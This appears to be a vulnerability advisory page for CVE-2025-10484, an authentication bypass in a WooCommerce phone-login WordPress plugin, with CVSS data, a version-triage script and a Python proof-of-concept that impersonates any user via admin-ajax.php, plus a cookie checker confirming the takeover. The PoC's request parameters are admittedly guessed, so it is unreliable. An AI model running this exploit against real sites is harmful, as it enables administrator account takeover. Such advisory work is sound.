Security Vulnerability Report
CVE-2025-10484 CVSS 9.8 CRITICAL

CVE-2025-10484

Published: 2026-01-17 09:15:50
Last Modified: 2026-04-15 00:35:42

Description

The Registration & Login with Mobile Phone Number for WooCommerce plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.3.1. This is due to the plugin not properly verifying a user's identity prior to authenticating them via the fma_lwp_set_session_php_fun() function. This makes it possible for unauthenticated attackers to authenticate as any user on the site, including administrators, without a valid password.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-288 (Authentication Bypass Using an Alternate Path or Channel)

Configurations (Affected Products)

No CPE configuration data is published in the NVD record for this CVE. The affected product, as stated in the description and the Wordfence advisory, is:

Registration & Login with Mobile Phone Number for WooCommerce <= 1.3.1 (all versions up to and including 1.3.1; no fixed version is recorded on this page)
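The advisory gives the affected range only as "<= 1.3.1", and a naive string comparison gets such ranges wrong (it would treat 1.3.10 as older than 1.3.2). The following triage helper is an added example, not code from the advisory or the plugin: it parses the standard WordPress plugin header block and decides, offline, whether an installed copy falls inside the affected range using component-wise numeric comparison, with pre-release tags sorting before their release. The sample header block is constructed for the example; the plugin's real file layout and slug are not given on this page.

```python
#!/usr/bin/env python3
"""Offline version triage for CVE-2025-10484 (added example).

Parses the WordPress plugin header ("Plugin Name:" / "Version:") and tests the
version against the advisory's inclusive upper bound of 1.3.1.
"""
import re

AFFECTED_MAX = "1.3.1"   # inclusive upper bound from the advisory
PLUGIN_NAME = "Registration & Login with Mobile Phone Number for WooCommerce"

# Matches " * Plugin Name: X" or "Version: X" lines of a plugin header comment.
HEADER_RE = re.compile(r"^\s*\*?\s*(Plugin Name|Version):\s*(.+?)\s*$", re.M)


def parse_plugin_header(text):
    """Return {'Plugin Name': ..., 'Version': ...} found in a plugin's main file."""
    return {key: value for key, value in HEADER_RE.findall(text)}


def version_key(version):
    """Normalise a version string to a comparable tuple.

    Numeric components compare numerically and are padded to four places
    (1.3 == 1.3.0.0).  A trailing pre-release tag such as 1.3.2-beta1 sorts
    before the matching release: releases end in (1,), pre-releases in (0, tag).
    """
    match = re.match(r"^(\d+(?:\.\d+)*)(?:[-.]?([A-Za-z].*))?$", version.strip())
    if not match:
        raise ValueError(f"unrecognised version: {version!r}")
    nums = tuple(int(part) for part in match.group(1).split("."))
    nums += (0,) * (4 - len(nums))
    prerelease = match.group(2)
    return nums + ((1,) if prerelease is None else (0, prerelease.lower()))


def is_affected(version, affected_max=AFFECTED_MAX):
    """True when version <= affected_max under component-wise comparison."""
    return version_key(version) <= version_key(affected_max)


def triage(header_text):
    """Return (plugin_name, version, affected) for one plugin header block."""
    header = parse_plugin_header(header_text)
    name, version = header.get("Plugin Name", ""), header.get("Version")
    if version is None:
        raise ValueError("no Version: line in plugin header")
    return name, version, name == PLUGIN_NAME and is_affected(version)


# Constructed sample header for the example; not the plugin's actual file.
SAMPLE_HEADER = """<?php
/**
 * Plugin Name: Registration & Login with Mobile Phone Number for WooCommerce
 * Description: Sample header used by the triage example.
 * Version: 1.3.1
 */
"""

if __name__ == "__main__":
    name, version, affected = triage(SAMPLE_HEADER)
    print(f"{name} {version}: {'AFFECTED' if affected else 'not in affected range'}")
```

Point `triage()` at the contents of the plugin's main PHP file on a site you are authorised to assess; a result of `affected == True` means the installed version is at or below 1.3.1 and the plugin should be updated or disabled.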

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. The AJAX action name (fma_lwp_set_session) and the request parameters it sends do not appear in the NVD record or the Wordfence reference on this page; they are the PoC's own assumptions about how fma_lwp_set_session_php_fun() is reached and should be confirmed against the plugin source before relying on the result.

```python
#!/usr/bin/env python3
"""
CVE-2025-10484 PoC - Authentication Bypass in WooCommerce Mobile Phone Login Plugin

Note: This PoC is for educational and authorized testing purposes only.
"""
import sys
from urllib.parse import urljoin

import requests


def exploit_auth_bypass(target_url, target_username):
    """
    Exploit the authentication bypass vulnerability in fma_lwp_set_session_php_fun()
    by directly setting a session for the target user without password verification.
    """
    # Target the AJAX endpoint used by the plugin
    ajax_endpoint = urljoin(target_url, '/wp-admin/admin-ajax.php')

    # Payload to trigger fma_lwp_set_session_php_fun() with the target username.
    # The action and parameter names are assumptions of this PoC, not values
    # taken from the advisory.
    payload = {
        'action': 'fma_lwp_set_session',   # Plugin AJAX action
        'username': target_username,       # Target user to impersonate
        'phone_number': '',                # Empty phone number bypasses verification
        'method': 'set_session',           # Direct session manipulation
    }

    try:
        print(f'[*] Attempting authentication bypass for user: {target_username}')
        print(f'[*] Target URL: {ajax_endpoint}')

        # Send malicious request
        response = requests.post(
            ajax_endpoint,
            data=payload,
            headers={
                'Content-Type': 'application/x-www-form-urlencoded',
                'X-Requested-With': 'XMLHttpRequest',
            },
            timeout=30,
            allow_redirects=False,
        )

        # Check for successful session creation indicators.
        # Any Set-Cookie is treated as success here; WordPress also sets
        # non-session cookies, so confirm a wordpress_logged_in_* cookie is
        # present before trusting this result.
        if response.status_code == 200:
            cookies = response.cookies
            if cookies:
                print('[+] SUCCESS: Authentication bypassed!')
                print(f'[+] Obtained session cookies: {dict(cookies)}')
                print(f'[*] You can now use these cookies to access the site as {target_username}')
                return True

            # Alternative check: look for session token in response
            if 'session' in response.text.lower() or 'success' in response.text.lower():
                print('[+] SUCCESS: Session data received')
                print(f'[*] Response: {response.text[:500]}')
                return True

        print('[-] Failed to bypass authentication')
        print(f'[*] Status code: {response.status_code}')
        print(f'[*] Response: {response.text[:500]}')
        return False

    except requests.exceptions.RequestException as e:
        print(f'[-] Request failed: {e}')
        return False


def main():
    if len(sys.argv) < 3:
        print('Usage: python cve-2025-10484-poc.py <target_url> <username>')
        print('Example: python cve-2025-10484-poc.py https://example.com admin')
        sys.exit(1)

    target_url = sys.argv[1].rstrip('/')
    target_username = sys.argv[2]
    exploit_auth_bypass(target_url, target_username)


if __name__ == '__main__':
    main()
```
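The PoC counts any returned cookie as a successful bypass, but WordPress sets cookies such as wordpress_test_cookie on requests that create no session at all. The helper below is an added example, not part of the PoC or the plugin: it recognises a real WordPress login by the wordpress_logged_in_<md5(siteurl)> cookie that core issues on authentication, parses its user_login|expiration|token|hmac value, and reports success only when the login name matches the account the test targeted. Cookie names and the value layout are WordPress core behaviour; the two cookie jars are constructed for the example, and the hash suffix in the cookie name is a placeholder.

```python
#!/usr/bin/env python3
"""Classify cookies returned by a WordPress request (added example).

Only a wordpress_logged_in_* cookie naming the expected user counts as a
session; wordpress_test_cookie and auth cookies for other users do not.
"""
from urllib.parse import unquote

LOGGED_IN_PREFIX = "wordpress_logged_in_"


def parse_logged_in_cookie(value):
    """Split a wordpress_logged_in_* value into its four fields.

    WordPress builds the value as user_login|expiration|token|hmac and
    URL-encodes it when setting the cookie, so both raw and %7C-encoded
    forms are accepted.  Returns None if the value is malformed.
    """
    parts = unquote(value).split("|")
    if len(parts) != 4:
        return None
    user, expiration, token, hmac_hex = parts
    if not expiration.isdigit() or not user:
        return None
    return {"user": user, "expiration": int(expiration), "token": token, "hmac": hmac_hex}


def authenticated_user(cookies):
    """Return the login name carried by a valid wordpress_logged_in_* cookie, or None."""
    for name, value in cookies.items():
        if name.startswith(LOGGED_IN_PREFIX):
            fields = parse_logged_in_cookie(value)
            if fields is not None:
                return fields["user"]
    return None


def bypass_succeeded(cookies, expected_user):
    """True only if the response carried a login cookie for expected_user."""
    return authenticated_user(cookies) == expected_user


# Constructed cookie jars (dict form, as requests.cookies gives with dict()).
# The md5 suffix and token/hmac values are placeholders, not captured data.
SESSION_JAR = {
    "wordpress_test_cookie": "WP%20Cookie%20check",
    "wordpress_logged_in_d41d8cd98f00b204e9800998ecf8427e":
        "admin%7C1767000000%7Cabc123token%7C0123456789abcdef0123456789abcdef",
}
NO_SESSION_JAR = {"wordpress_test_cookie": "WP%20Cookie%20check"}

if __name__ == "__main__":
    for label, jar in (("session jar", SESSION_JAR), ("no-session jar", NO_SESSION_JAR)):
        print(f"{label}: user={authenticated_user(jar)!r} "
              f"bypass as admin={bypass_succeeded(jar, 'admin')}")
```

In a live test, pass `dict(response.cookies)` from the PoC's request to `bypass_succeeded()` with the targeted username; a bare test cookie, or a login cookie for some other account, is then reported as a failure rather than a bypass.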

References

- https://woocommerce.com/products/registration-login-with-mobile-phone-number/ (vendor product page)
- https://www.wordfence.com/threat-intel/vulnerabilities/id/6aef6fbb-be8c-49e1-ada5-7b4aa8b2ff72?source=cve (Wordfence advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2025-10484", "sourceIdentifier": "[email protected]", "published": "2026-01-17T09:15:50.303", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Registration & Login with Mobile Phone Number for WooCommerce plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.3.1. This is due to the plugin not properly verifying a users identity prior to authenticating them via the fma_lwp_set_session_php_fun() function. This makes it possible for unauthenticated attackers to authenticate as any user on the site, including administrators, without a valid password."}, {"lang": "es", "value": "El plugin Registration & Login with Mobile Phone Number para WooCommerce para WordPress es vulnerable a la omisión de autenticación en todas las versiones hasta la 1.3.1, inclusive. Esto se debe a que el plugin no verifica correctamente la identidad de un usuario antes de autenticarlo a través de la función fma_lwp_set_session_php_fun(). Esto hace posible que atacantes no autenticados se autentiquen como cualquier usuario del sitio, incluidos los administradores, sin una contraseña válida."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://woocommerce.com/products/registration-login-with-mobile-phone-number/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6aef6fbb-be8c-49e1-ada5-7b4aa8b2ff72?source=cve", "source": "[email protected]"}]}}
```